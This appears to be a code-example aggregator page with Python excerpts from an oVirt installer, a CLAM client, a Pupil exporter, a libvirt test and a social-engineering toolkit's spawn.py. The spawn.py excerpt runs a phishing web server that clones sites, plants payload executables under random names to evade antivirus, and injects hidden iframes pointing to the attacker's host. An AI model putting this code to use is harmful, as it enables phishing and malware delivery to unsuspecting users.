            self.disk = "/dev/" + self.disk
        try:
            if stat.S_ISBLK(os.stat(self.disk).st_mode):
                try:
                    if stat.S_ISBLK(os.stat(self.disk[:-1]).st_mode):
                        # e.g. /dev/sda2
                        self.disk = self.disk[:-1]
                except OSError:
                    pass
                try:
                    if stat.S_ISBLK(os.stat(self.disk[:-2]).st_mode):
                        # e.g. /dev/mapper/WWIDp2
                        self.disk = self.disk[:-2]
                except OSError:
                    pass
        except OSError:
            logger.error("Unable to determine disk for grub installation " +
                         traceback.format_exc())
            return False

        self.grub_dict = {
        "product": _functions.PRODUCT_SHORT,
        "version": _functions.PRODUCT_VERSION,
        "release": _functions.PRODUCT_RELEASE,
        "partN": self.partN,
        "root_param": self.root_param,
        "bootparams": self.bootparams,
        "disk": self.disk,
        "grub_dir": self.grub_dir,
        "grub_prefix": self.grub_prefix,
        "efi_hd": self.efi_hd,
        "linux": "linux",
        "initrd": "initrd",
    }
        if not _functions.is_firstboot():
            if os.path.ismount("/live"):
                with open("%s/version" % self.live_path) as version:
                    for line in version.readlines():
                        if "VERSION" in line:
                            key, value = line.split("=")
                            self.grub_dict["version"] = value.strip()
                        if "RELEASE" in line:
                            key, value = line.split("=")
                            self.grub_dict["release"] = value.strip()

        if _functions.grub2_available():
            if not self.grub2_install():
                logger.error("Grub2 Installation Failed ")
                return False
            else:
                 logger.info("Grub2 EFI Installation Completed ")
        else:
            if not self.grub_install():
                logger.error("Grub Installation Failed ")
                return False
            else:
                logger.info("Grub Installation Completed")

        if _functions.is_iscsi_install() or _functions.findfs("BootNew"):
            # copy default for when Root/HostVG is inaccessible(iscsi upgrade)
            shutil.copy(_functions.OVIRT_DEFAULTS, "/boot")
            # mark new Boot ready to go, reboot() in ovirt-function switches it
            # to active
            e2label_cmd = "e2label \"%s\" BootUpdate" % boot_candidate_dev

            if not _functions.system(e2label_cmd):
                logger.error("Unable to relabel " + boot_candidate_dev +
                             " to RootUpdate ")
                return False
        else:
            _functions.system("umount /liveos/efi")
        _functions.system("umount /liveos")
        # mark new Root ready to go, reboot() in ovirt-function switches it
        # to active
        e2label_cmd = "e2label \"%s\" RootUpdate" % candidate_dev
        if not _functions.system(e2label_cmd):
            logger.error("Unable to relabel " + candidate_dev +
                         " to RootUpdate ")
            return False
        _functions.system("udevadm settle --timeout=10")

        #
        # Rebuild the initramfs
        # A few hacks are needed to prep the chroot
        # The general issue is that we need to run dracut in the context fo the new iso
        # and that we need to put the initrd in the right place of the new iso.
        # These two things make the logic a bit more complicated.
        #
        mnts = []
        try:
            if not _functions.system("blkid -L RootUpdate"):
                raise RuntimeError("RootUpdate not found")

            # Let's mount the update fs, and use that kernel version and modules
            # We need this work to help dracut
            isomnt = tempfile.mkdtemp("RootUpdate")
            squashmnt = tempfile.mkdtemp("RootUpdate-LiveOS")
            updfs = tempfile.mkdtemp("RootUpdate-LiveOS-Img")
            mnts += [isomnt, squashmnt, updfs]

            # Unpack the iso
            def _call(args):
                logger.debug("Calling: %s" % args)
                try:
                    out = subprocess.check_output(args)
                    logger.debug("Out: %s" % out)
                except Exception as e:
                    logger.debug("Failed with: %s %s" % (e, e.output))
                    raise

            _call(["mount", "LABEL=RootUpdate", isomnt])
            _call(["mount", "%s/LiveOS/squashfs.img" % isomnt, squashmnt])
            _call(["mount", "%s/LiveOS/ext3fs.img" % squashmnt, updfs])

            # Now mount the update modules into place, and find the
            # correct kver
            def rbind(path, updfs=updfs):
                dst = updfs + "/" + path
                logger.debug("Binding %r to %r" % (path, dst))
                _call(["mount", "--make-rshared", "--rbind", "/" + path, dst])
                return dst

            for path in ["etc", "dev", "proc", "sys", "tmp", "run", "var/tmp"]:
                mnts += [rbind(path)]

            upd_kver = str(_functions.passthrough("ls -1 %s/lib/modules" % updfs)).strip()

            if len(upd_kver.splitlines()) != 1:
                # It would be very unusual to see more than one kver directory
                # in /lib/modules but might happen when using edit-node.
                # Check via check_higher_kernel() the higher version available
                upd_kver = self.check_higher_kernel(updfs)
                if upd_kver is None:
                    raise RuntimeError("Unable to find the kernel version")

            # Update initramfs to pickup multipath wwids
            # Let /boot point to the filesystem on the update candidate partition
            builder = _system.Initramfs(dracut_chroot=updfs, boot_source=isomnt)
            builder.rebuild(kver=upd_kver)

        except Exception as e:
            logger.debug("Failed to build initramfs: %s" % e, exc_info=True)
            output = getattr(e, "output", "")
            if output:
                logger.debug("Output: %s" % output)
            raise


        finally:
            # Clean up all eventual mounts
            pass
            # Disabled for now because akward things happen, we leave it to
            # systemd to unnmount on reboot
            # for mnt in reversed(mnts):
            #     d = _functions.passthrough("umount -fl %s" % mnt, logger.debug)
            #     logger.debug("Returned: %s" % d)

        _functions.disable_firstboot()
        if _functions.finish_install():
            if _functions.is_firstboot():
                _iscsi.iscsi_auto()
            logger.info("Installation of %s Completed" % \
                                                      _functions.PRODUCT_SHORT)
            if reboot is not None and reboot == "Y":
                _system.async_reboot()
            return True
        else:
            return False

Example 34

Project: clam
Source File: clamclient.py
View license
def main():
    username = password = None
    parameters = {}
    begin = 0
    rawargs = sys.argv[1:]
    for i,o in enumerate(rawargs):
        if o == '-u':
            username = rawargs[i+1]
            begin = i+2
        elif o == '-p':
            password = rawargs[i+1]
            begin = i+2
        elif o == '-h':
            usage()
            sys.exit(0)
        elif o == '-v':
            print("CLAM Client version " + str(VERSION),file=sys.stderr)
            sys.exit(0)
        elif o[0] == '-' and len(o) > 1 and o[1] != '-':
            usage()
            print("ERROR: Unknown option: ", o,file=sys.stderr)
            sys.exit(2)
        elif o[:2] == '--':
            if len(rawargs) > i + 1:
                parameters[o[2:]] = rawargs[i+1]
                begin = i+2
            else:
                parameters[o[2:]] = True
                begin = i+1

    if len(rawargs) > begin:
        url = rawargs[begin]
    else:
        usage()
        sys.exit(2)
        print("ERROR: URL expected",file=sys.stderr)
    if url[:4] != 'http':
        print("ERROR: URL expected",file=sys.stderr)
        usage()
        sys.exit(2)

    client = CLAMClient(url, username,password)

    if len(rawargs) > begin + 1:
        command = rawargs[begin+1]
        args = rawargs[begin+2:]
    else:
        command = 'info'
        args = []

    if command == 'info' and len(args) > 1:
        command = 'get'


    try:
        data = None
        if command in ['info','index','projects','inputtemplates','parameters','profiles']:
            data = client.index()
        elif command in ['get','input','output','status','inputtemplate']:
            if len(args) != 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            data = client.get(args[0])
        elif command == 'create':
            if len(args) != 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            client.create(args[0])
        elif command == 'delete' or command == 'abort':
            if len(args) != 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            client.delete(args[0])
        #elif command == 'reset':
        #    if len(args) != 1:
        #        print("Expected project ID"
        #        sys.exit(2)
        #    client.reset(args[0])
        elif command == 'start':
            if len(args) < 1:
                print("Expected project ID",file=sys.stderr)
                sys.exit(2)
            client.start(args[0])
        elif command == 'xml':
            if len(args) ==1:
                data = client.get(args[0])
            else:
                data = client.index()
        elif command == 'upload':
            if len(args) < 3:
                print("Expected: project inputtemplate file ",file=sys.stderr)
                sys.exit(2)
            project = args[0]
            data = client.get(project)
            try:
                inputtemplate = data.inputtemplate(args[1])
            except:
                print("No such input template: " + args[1],file=sys.stderr)
                sys.exit(2)
            filepath = args[2]
            if not os.path.isfile(filepath):
                print("File does not exist: " + filepath,file=sys.stderr)
                sys.exit(2)
            client.upload(project,inputtemplate, filepath, **parameters)
        elif command == 'download':
            if len(args) < 2:
                print("Expected: project file ",file=sys.stderr)
                sys.exit(2)

            project = args[0]
            filepath = args[1]
            if len(args) == 3:
                targetfile = args[2]
            else:
                targetfile = os.path.basename(filepath)
            client.download(project, filepath, targetfile)
        else:
            print("Unknown command: " + command,file=sys.stderr)
            sys.exit(1)


        if data:
            if command == 'xml':
                print(data.xml)
            if command in ['info','get']:
                print("General Information")
                print("\tSystem ID:   " + data.system_id)
                print("\tSystem Name: " + data.system_name)
                print("\tSystem URL:  " + data.baseurl)
                if username:
                    print("\tUser:        " + username)
                if command == 'get':
                    print("\tProject:     " + data.project)
            if command in ['info','projects','index']:
                print("Projects")
                for project in data.projects:
                    print("\t" + project)
            if command in ['get','status']:
                print("Status Information")
                print("\tStatus: " + str(data.status)) #TODO: nicer messages
                print("\tStatus Message: " + data.statusmessage)
                print("\tCompletion: " + str(data.completion) + "%")
            if command in ['info','profiles']:
                print("Profiles:") #TODO: Implement
                for i, profile in enumerate(data.profiles):
                    print("\tProfile " + str(i+1))
                    print("\t Input")
                    for template in profile.input:
                        print("\t\t" + template.id + " - " + template.label)
                    print("\t Output")
                    for template in profile.output:
                        if isinstance(template, ParameterCondition):
                            for t in template.allpossibilities():
                                print("\t\t(CONDITIONAL!) " + t.id + " - " + t.label)
                        else:
                            print("\t\t" + template.id + " - " + template.label)
            if command == 'inputtemplates':
                print("Input templates:")
                for template in data.input:
                    print("\t\t" + template.id + " - " + template.label)
            if command == 'inputtemplate':
                try:
                    inputtemplate = data.inputtemplate(args[0])
                except:
                    print("No such inputtemplate",file=sys.stderr)
                    sys.exit(1)
                print("Inputtemplate parameters:")
                for parameter in inputtemplate.parameters:
                    print("\t\t" + str(parameter)) #VERIFY: unicode support?
                print("Inputtemplate converters:")
                for c in inputtemplate.converters:
                    print("\t\t" + c.id + " - " + c.label )
            if command in ['info','parameters']:
                print("Global Parameters:")
                for group, parameters in data.parameters:
                    print("\t" + group)
                    for parameter in parameters:
                        print("\t\t" + str(parameter))#VERIFY: unicode support?
            if command in ['get','input'] and data.input:
                print("Input files:")
                for f in data.input:
                    print("\t" + f.filename + "\t" + str(f),end="")
                    if f.metadata and f.metadata.inputtemplate:
                        print("\t" + f.metadata.inputtemplate)
                    else:
                        print
            if command in ['get','output'] and data.output:
                print("Output files:")
                for f in data.output:
                    print("\t" + f.filename + "\t" + str(f),end="")
                    if f.metadata and f.metadata.provenance and f.metadata.provenance.outputtemplate_id:
                        print("\t" + f.metadata.provenance.outputtemplate_id)
                    else:
                        print

    except NotFound:
        print("Not Found (404)",file=sys.stderr)
    except PermissionDenied:
        print("Permission Denied (403)",file=sys.stderr)
    except ServerError:
        print("Server Error! (500)",file=sys.stderr)
    except AuthRequired:
        print("Authorization required (401)",file=sys.stderr)

Example 35

Project: pupil
Source File: batch_exporter.py
View license
def main():


    def show_progess(jobs):
        no_jobs = len(jobs)
        width = 80
        full = width/no_jobs
        string = ""
        for j in jobs:
            try:
                p = int(width*j.current_frame.value/float(j.frames_to_export.value*no_jobs) )
            except:
                p = 0
            string += '['+ p*"|"+(full-p)*"-" + "]"
        sys.stdout.write("\r"+string)
        sys.stdout.flush()


    """Batch process recordings to produce visualizations
    Using simple_circle as the default visualizations
    Steps:
        - User Supplies: Directory that contains many recording(s) dirs or just one recordings dir
        - We walk the user supplied directory to get all data folders
        - Data is the list we feed to our multiprocessed
        - Error check -- do we have required files in each dir?: world.avi, gaze_positions.npy, timestamps.npy
        - Result: world_viz.avi within each original data folder
    """


    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
        description=dedent('''\
            ***************************************************
            Batch process recordings to produce visualizations
            The default visualization will use simple_circle

            Usage Example:
                python batch_exporter.py -d /path/to/folder-with-many-recordings -s ~/Pupil_Player/settings/user_settings -e ~/my_export_dir
            Arguments:
                -d : Specify a recording directory.
                     This could have one or many recordings contained within it.
                     We will recurse into the dir.
                -s : Specify path to Pupil Player user_settings file to use last used vizualization settings.
                -e : Specify export directory if you dont want the export saved within each recording dir.
                -p : Export a 120 frame preview only.
            ***************************************************\
        '''))
    parser.add_argument('-d', '--rec-dir',required=True)
    parser.add_argument('-s', '--settings-file',required=True)
    parser.add_argument('-e', '--export-to-dir',default=False)
    parser.add_argument('-c', '--basic-color',default='red')
    parser.add_argument('-p', '--preview', action='store_true')

    if len(sys.argv)==1:
        print parser.description
        return

    args = parser.parse_args()
    # get the top level data folder from terminal argument

    data_dir = args.rec_dir

    if args.settings_file and os.path.isfile(args.settings_file):
        session_settings = Persistent_Dict(os.path.splitext(args.settings_file)[0])
        #these are loaded based on user settings
        plugin_initializers = session_settings.get('loaded_plugins',[])
        session_settings.close()
    else:
        logger.error("Setting file not found or valid")
        return

    if args.export_to_dir:
        export_dir = args.export_to_dir
        if os.path.isdir(export_dir):
            logger.info("Exporting all vids to %s"%export_dir)
        else:
            logger.error("Exporting dir is not valid %s"%export_dir)
            return
    else:
        export_dir = None
        logger.info("Exporting into the recording dirs.")

    if args.preview:
        preview = True
        logger.info("Exporting first 120frames only")
    else:
        preview =  False

    class Temp(object):
        pass

    recording_dirs = get_recording_dirs(data_dir)
    # start multiprocessing engine
    n_cpu = cpu_count()
    logger.info("Using a maximum of %s CPUs to process visualizations in parallel..." %n_cpu)

    jobs = []
    outfiles = set()
    for d in recording_dirs:
        j = Temp()
        logger.info("Adding new export: %s"%d)
        j.should_terminate = Value(c_bool,0)
        j.frames_to_export  = Value(c_int,0)
        j.current_frame = Value(c_int,0)
        j.data_dir = d
        j.user_dir = None
        j.start_frame= None
        if preview:
            j.end_frame = 30
        else:
            j.end_frame = None
        j.plugin_initializers = plugin_initializers[:]

        if export_dir:
            #make a unique name created from rec_session and dir name
            rec_session, rec_dir = d.rsplit(os.path.sep,2)[1:]
            out_name = rec_session+"_"+rec_dir+".mp4"
            j.out_file_path = os.path.join(os.path.expanduser(export_dir),out_name)
            if j.out_file_path in outfiles:
                logger.error("This export setting would try to save %s at least twice pleace rename dirs to prevent this."%j.out_file_path)
                return
            outfiles.add(j.out_file_path)
            logger.info("Exporting to: %s"%j.out_file_path)

        else:
            j.out_file_path = None

        j.args = (j.should_terminate,j.frames_to_export,j.current_frame, j.data_dir, j.user_dir,j.start_frame,j.end_frame,j.plugin_initializers,j.out_file_path)
        jobs.append(j)


    todo = jobs[:]
    workers = [Export_Process(target=export,args=todo.pop(0).args) for i in range(min(len(todo),n_cpu))]
    for w in workers:
        w.start()

    working = True

    t = time.time()
    while working: #cannot use pool as it does not allow shared memory
        working = False
        for i in range(len(workers)):
            if workers[i].is_alive():
                working = True
            else:
                if todo:
                    workers[i] = Process(target=export,args=todo.pop(0).args)
                    workers[i].start()
                    working = True
        show_progess(jobs)
        time.sleep(.25)
    print '\n'

Example 36

Project: pwn_plug_sources
Source File: spawn.py
View license
def web_server_start():
        # define if use apache or not
        apache=0
        # open set_config here
        apache_check=file("%s/config/set_config" % (definepath),"r").readlines()
        # loop this guy to search for the APACHE_SERVER config variable
        for line in apache_check:
        	# strip \r\n
                line=line.rstrip()
        	# if apache is turned on get things ready
                match=re.search("APACHE_SERVER=ON",line)
        	# if its on lets get apache ready
                if match:
                        for line2 in apache_check:
        			# set the apache path here
        			match2=re.search("APACHE_DIRECTORY=", line2)
        			if match2:
        				line2=line2.rstrip()
        				apache_path=line2.replace("APACHE_DIRECTORY=","")
        				apache=1
        				if operating_system == "windows": apache = 0

        # GRAB DEFAULT PORT FOR WEB SERVER
        fileopen=file("config/set_config" , "r").readlines()
        counter=0
        for line in fileopen:
                line=line.rstrip()
                match=re.search("WEB_PORT=", line)
                if match:
                        line=line.replace("WEB_PORT=", "")
                        web_port=line
                        counter=1
        if counter == 0: web_port=80

        # see if exploit requires webdav
        if os.path.isfile("src/program_junk/meta_config"):
        	fileopen=file("src/program_junk/meta_config", "r")
        	for line in fileopen:
        		line=line.rstrip()
        		match=re.search("set SRVPORT 80", line)
        		if match:
        			match2=re.search("set SRVPORT 8080", line)
        			if not match2:
        				web_port=8080

        # Open the IPADDR file
        fileopen=file("src/program_junk/ipaddr.file","r").readlines()
        for line in fileopen:
            line=line.rstrip()
            ipaddr=line

        # Grab custom or set defined
        if os.path.isfile("src/program_junk/site.template"):
                fileopen=file("src/program_junk/site.template","r").readlines()
                for line in fileopen:
                        line=line.rstrip()
                        match=re.search("TEMPLATE=", line)
                        if match:
                                line=line.split("=")
                                template=line[1]
	
        # grab web attack selection
        if os.path.isfile("src/program_junk/attack_vector"):
                fileopen=file("src/program_junk/attack_vector","r").readlines()
                for line in fileopen:
        	        attack_vector=line.rstrip()
        
        # if it doesn't exist just set a default template
        if not os.path.isfile("src/program_junk/attack_vector"):
                attack_vector = "nada"

        # Sticking it to A/V below
        import string,random
        def random_string(minlength=6,maxlength=15):
                  length=random.randint(minlength,maxlength)
                  letters=string.ascii_letters+string.digits
                  return ''.join([random.choice(letters) for _ in range(length)])
        rand_gen=random_string() #+".exe"

        # check multiattack flags here
        multiattack_harv = "off"
        if os.path.isfile("src/program_junk/multi_harvester"):
        	multiattack_harv = "on"
        if os.path.isfile("src/program_junk/multi_tabnabbing"):
        	multiattack_harv = "on"

        # open our config file that was specified in SET
        if os.path.isfile("src/program_junk/site.template"):
                fileopen=file("src/program_junk/site.template", "r").readlines()
                # start loop here
                for line in fileopen:
                        line=line.rstrip()
                        # look for config file and parse for URL
                        match=re.search("URL=",line)
                        if match:
                                line=line.split("=")
                                # define url to clone here
                                url=line[1].rstrip()
        # if we didn't create template then do self
        if not os.path.isfile("src/program_junk/site.template"):
                template = "SELF"

        # If SET is setting up the website for you, get the website ready for delivery
        if template == "SET":

        	# change to that directory
        	os.chdir("src/html/")
        	# remove stale index.html files
        	if os.path.isfile("index.html"):
        		os.remove("index.html")
        	# define files and get ipaddress set in index.html
        	fileopen=file("index.template", "r").readlines()
        	filewrite=file("index.html", "w")
        	if attack_vector == "java":
        		for line in fileopen:
        			match1=re.search("msf.exe", line)
        			if match1: line=line.replace("msf.exe", rand_gen)
        			match=re.search("ipaddrhere", line)
        			if match:
        				line=line.replace("ipaddrhere", ipaddr)
        			filewrite.write(line)
        		# move random generated name
        		filewrite.close()
        		shutil.copyfile("msf.exe", rand_gen)
		
        	# define browser attack vector here
        	if attack_vector == "browser":
                	counter=0
                	for line in fileopen:
                                counter=0
                                match=re.search("Signed_Update.jar", line)
                                if match:
                                        line=line.replace("Signed_Update.jar", "invalid.jar")
                                        filewrite.write(line)
                                        counter=1
                                match2=re.search("<head>", line)
                                if match2:
                                        if web_port != 8080:
                                                line=line.replace("<head>", '<head><iframe src ="http://%s:8080/" width="100" height="100" scrolling="no"></iframe>' % (ipaddr))
                                                filewrite.write(line)
                                                counter=1
                                        if web_port == 8080:
                                                line=line.replace("<head>", '<head><iframe src = "http://%s:80/" width="100" height="100" scrolling="no" ></iframe>' % (ipaddr))
                                                filewrite.write(line)
                                                counter=1
                                if counter == 0:
                                	filewrite.write(line)
                filewrite.close()

        if template == "CUSTOM" or template == "SELF":
        	# Bring our files to our directory
                if attack_vector != 'hid': 
                	if attack_vector != 'hijacking':
                        	print "\n" + bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC
                                # copy all the files needed
                                if not os.path.isfile("%s/src/program_junk/Signed_Update.jar" % (definepath)):
                                        shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % (definepath), "%s/src/program_junk/Signed_Update.jar" % (definepath))
                                shutil.copyfile("%s/src/program_junk/Signed_Update.jar" % (definepath), "%s/src/program_junk/web_clone/Signed_Update.jar" % (definepath))
                                if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
                                        shutil.copyfile("%s/src/html/nix.bin" % (definepath), "%s/src/program_junk/web_clone/nix.bin" % (definepath))
                                if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
                                        shutil.copyfile("%s/src/html/mac.bin" % (definepath), "%s/src/program_junk/web_clone/mac.bin" % (definepath))
                                if os.path.isfile("%s/src/html/msf.exe" % (definepath)):
                                        shutil.copyfile("%s/src/html/msf.exe" % (definepath), "%s/src/program_junk/web_clone/msf.exe" % (definepath))
                        	# pull random name generation
                                PrintStatus("The site has been moved. SET Web Server is now listening..")
                        	if os.path.isfile("%s/src/program_junk/rand_gen" % (definepath)):
                        		fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
                        		for line in fileopen:
                        			rand_gen=line.rstrip()
                        		if os.path.isfile("%s/src/program_junk/custom.exe" % (definepath)):
                                                shutil.copyfile("src/html/msf.exe", "src/program_junk/web_clone/msf.exe")
                                		print "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
                                	shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/web_clone/%s" % (rand_gen))	
                os.chdir("%s/src/program_junk/web_clone" % (definepath))
                

        # if docbase exploit do some funky stuff to get it to work right
        #  <TITLE>Client  Log In</TITLE>
        if os.path.isfile("%s/src/program_junk/docbase.file" % (definepath)):
        	docbase=(r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
  		 "http://www.w3.org/TR/html4/frameset.dtd">
		<HTML>
		<HEAD>
		<TITLE></TITLE>
		</HEAD>
		<FRAMESET rows="99%%, 1%%">
      		<FRAME src="site.html">
      		<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
		</FRAMESET>
		</HTML>""" % (ipaddr))
        	if os.path.isfile("%s/src/program_junk/web_clone/site.html" % (definepath)): os.remove("%s/src/program_junk/web_clone/site.html" % (definepath))
                shutil.copyfile("%s/src/program_junk/web_clone/index.html" % (definepath), "%s/src/program_junk/web_clone/site.html" % (definepath))
        	filewrite=file("%s/src/program_junk/web_clone/index.html" % (definepath), "w")
        	filewrite.write(docbase)
        	filewrite.close()	

        ####################################################################################################################################
        #
        # START WEB SERVER STUFF HERE
        #
        ####################################################################################################################################
        if apache == 0:
                if multiattack_harv == 'off':
                        # specify port listener here
                        # get SimpleHTTP up and running
                        Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
                        class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
                                pass

                        try:
                                class ReusableTCPServer(SocketServer.TCPServer):
                                        allow_reuse_address = True
                                server = ReusableTCPServer(('', int(web_port)), Handler)
                                thread.start_new_thread(server.serve_forever, ())
                                
                        # Handle KeyboardInterrupt
                        except KeyboardInterrupt:
                                ExitSet()
                
                        # Handle Exceptions
                        except Exception,e:
                                print e
                                log(e)
                                print bcolors.RED + "ERROR: You probably have something running on port 80 already, Apache??"
                                print "There was an issue, printing error: " +str(e) + bcolors.ENDC
                                ExitSet()
                        
                        # if we are custom, put a pause here to not terminate thread on web server
                        if template == "CUSTOM" or template == "SELF":
                                custom_exe = check_options("CUSTOM_EXE=")
                                if custom_exe != 0:
                                        while 1: 
                                                # try block inside of loop, if control-c detected, then exit
                                                try:
                                                        pause = raw_input(bcolors.GREEN + "\n[*] Web Server is listening. Press Control-C to exit." + bcolors.ENDC)

                                                # handle keyboard interrupt
                                                except KeyboardInterrupt:
                                                        print bcolors.GREEN + "[*] Returning to main menu." + bcolors.ENDC
                                                        break

        if apache == 1:
        	subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/src/html/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/Signed* %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path), shell=True).wait()

        #####################################################################################################################################
        #
        # END WEB SERVER STUFF HERE
        #
        #####################################################################################################################################

        if operating_system != "windows":
                # Grab metaspoit path
                msf_path=meta_path()
                import pexpect

Example 37

Project: tp-libvirt
Source File: remote_access.py
View license
def run(test, params, env):
    """
    Test remote access with TCP, TLS connection
    """

    test_dict = dict(params)
    vm_name = test_dict.get("main_vm")
    status_error = test_dict.get("status_error", "no")
    allowed_dn_str = params.get("tls_allowed_dn_list")
    if allowed_dn_str:
        allowed_dn_list = []
        if not libvirt_version.version_compare(1, 0, 0):
            # Reverse the order in the dn list to workaround the
            # feature changes between RHEL 6 and RHEL 7
            dn_list = allowed_dn_str.split(",")
            dn_list.reverse()
            allowed_dn_str = ','.join(dn_list)
        allowed_dn_list.append(allowed_dn_str)
        test_dict['tls_allowed_dn_list'] = allowed_dn_list
    transport = test_dict.get("transport")
    plus = test_dict.get("conn_plus", "+")
    config_ipv6 = test_dict.get("config_ipv6", "no")
    tls_port = test_dict.get("tls_port", "")
    listen_addr = test_dict.get("listen_addr", "0.0.0.0")
    ssh_port = test_dict.get("ssh_port", "")
    tcp_port = test_dict.get("tcp_port", "")
    server_ip = test_dict.get("server_ip")
    server_user = test_dict.get("server_user")
    server_pwd = test_dict.get("server_pwd")
    no_any_config = params.get("no_any_config", "no")
    sasl_user_pwd = test_dict.get("sasl_user_pwd")
    sasl_allowed_users = test_dict.get("sasl_allowed_users")
    server_cn = test_dict.get("server_cn")
    custom_pki_path = test_dict.get("custom_pki_path")
    rm_client_key_cmd = test_dict.get("remove_client_key_cmd")
    rm_client_cert_cmd = test_dict.get("remove_client_cert_cmd")
    ca_cn_new = test_dict.get("ca_cn_new")
    no_verify = test_dict.get("no_verify", "no")
    ipv6_addr_des = test_dict.get("ipv6_addr_des")
    tls_sanity_cert = test_dict.get("tls_sanity_cert")
    restart_libvirtd = test_dict.get("restart_libvirtd", "yes")
    diff_virt_ver = test_dict.get("diff_virt_ver", "no")
    driver = test_dict.get("test_driver", "qemu")
    uri_path = test_dict.get("uri_path", "/system")
    virsh_cmd = params.get("virsh_cmd", "list")
    action = test_dict.get("libvirtd_action", "restart")
    uri_user = test_dict.get("uri_user", "")
    unix_sock_dir = test_dict.get("unix_sock_dir")
    mkdir_cmd = test_dict.get("mkdir_cmd")
    rmdir_cmd = test_dict.get("rmdir_cmd")
    adduser_cmd = test_dict.get("adduser_cmd")
    deluser_cmd = test_dict.get("deluser_cmd")
    auth_conf = test_dict.get("auth_conf")
    auth_conf_cxt = test_dict.get("auth_conf_cxt")
    polkit_pkla = test_dict.get("polkit_pkla")
    polkit_pkla_cxt = test_dict.get("polkit_pkla_cxt")
    ssh_setup = test_dict.get("ssh_setup", "no")
    tcp_setup = test_dict.get("tcp_setup", "no")
    tls_setup = test_dict.get("tls_setup", "no")
    unix_setup = test_dict.get("unix_setup", "no")
    ssh_recovery = test_dict.get("ssh_auto_recovery", "yes")
    tcp_recovery = test_dict.get("tcp_auto_recovery", "yes")
    tls_recovery = test_dict.get("tls_auto_recovery", "yes")
    unix_recovery = test_dict.get("unix_auto_recovery", "yes")

    port = ""
    # extra URI arguments
    extra_params = ""
    # it's used to clean up SSH, TLS, TCP, UNIX and SASL objs later
    objs_list = []
    # redirect LIBVIRT_DEBUG log into test log later
    test_dict["logfile"] = test.logfile

    # Make sure all of parameters are assigned a valid value
    check_parameters(test_dict)

    # only simply connect libvirt daemon then return
    if no_any_config == "yes":
        test_dict["uri"] = "%s%s%s://%s" % (driver, plus, transport, uri_path)
        remote_access(test_dict)
        return

    # append extra 'pkipath' argument to URI if exists
    if custom_pki_path:
        extra_params = "?pkipath=%s" % custom_pki_path

    # append extra 'no_verify' argument to URI if exists
    if no_verify == "yes":
        extra_params = "?no_verify=1"

    # append extra 'socket' argument to URI if exists
    if unix_sock_dir:
        extra_params = "?socket=%s/libvirt-sock" % unix_sock_dir

    # generate auth.conf and default under the '/etc/libvirt'
    if auth_conf_cxt and auth_conf:
        cmd = "echo -e '%s' > %s" % (auth_conf_cxt, auth_conf)
        utils.system(cmd, ignore_status=True)

    # generate polkit_pkla and default under the
    # '/etc/polkit-1/localauthority/50-local.d/'
    if polkit_pkla_cxt and polkit_pkla:
        cmd = "echo -e '%s' > %s" % (polkit_pkla_cxt, polkit_pkla)
        utils.system(cmd, ignore_status=True)

    # generate remote IP
    if config_ipv6 == "yes" and ipv6_addr_des:
        remote_ip = "[%s]" % ipv6_addr_des
    elif config_ipv6 != "yes" and server_cn:
        remote_ip = server_cn
    elif config_ipv6 != "yes" and ipv6_addr_des:
        remote_ip = "[%s]" % ipv6_addr_des
    elif server_ip and transport != "unix":
        remote_ip = server_ip
    else:
        remote_ip = ""

    # get URI port
    if tcp_port != "":
        port = ":" + tcp_port

    if tls_port != "":
        port = ":" + tls_port

    if ssh_port != "" and not ipv6_addr_des:
        port = ":" + ssh_port

    # generate URI
    uri = "%s%s%s://%s%s%s%s%s" % (driver, plus, transport, uri_user,
                                   remote_ip, port, uri_path, extra_params)
    test_dict["uri"] = uri

    logging.debug("The final test dict:\n<%s>", test_dict)

    if virsh_cmd == "start" and transport != "unix":
        session = remote.wait_for_login("ssh", server_ip, "22", "root",
                                        server_pwd, "#")
        cmd = "virsh domstate %s" % vm_name
        status, output = session.cmd_status_output(cmd)
        if status:
            session.close()
            raise error.TestNAError(output)

        session.close()

    try:
        # setup IPv6
        if config_ipv6 == "yes":
            ipv6_obj = IPv6Manager(test_dict)
            objs_list.append(ipv6_obj)
            ipv6_obj.setup()

        # compare libvirt version if needs
        if diff_virt_ver == "yes":
            compare_virt_version(server_ip, server_user, server_pwd)

        # setup SSH
        if transport == "ssh" or ssh_setup == "yes":
            if not test_dict.get("auth_pwd"):
                ssh_obj = SSHConnection(test_dict)
                if ssh_recovery == "yes":
                    objs_list.append(ssh_obj)
                # setup test environment
                ssh_obj.conn_setup()

        # setup TLS
        if transport == "tls" or tls_setup == "yes":
            tls_obj = TLSConnection(test_dict)
            if tls_recovery == "yes":
                objs_list.append(tls_obj)
            # reserve cert path
            tmp_dir = tls_obj.tmp_dir
            # setup test environment
            if tls_sanity_cert == "no":
                # only setup CA and client
                tls_obj.conn_setup(False, True)
            else:
                # setup CA, server and client
                tls_obj.conn_setup()

        # setup TCP
        if transport == "tcp" or tcp_setup == "yes":
            tcp_obj = TCPConnection(test_dict)
            if tcp_recovery == "yes":
                objs_list.append(tcp_obj)
            # setup test environment
            tcp_obj.conn_setup()

        # create a directory if needs
        if mkdir_cmd:
            utils.system(mkdir_cmd, ignore_status=True)

        # setup UNIX
        if transport == "unix" or unix_setup == "yes":
            unix_obj = UNIXConnection(test_dict)
            if unix_recovery == "yes":
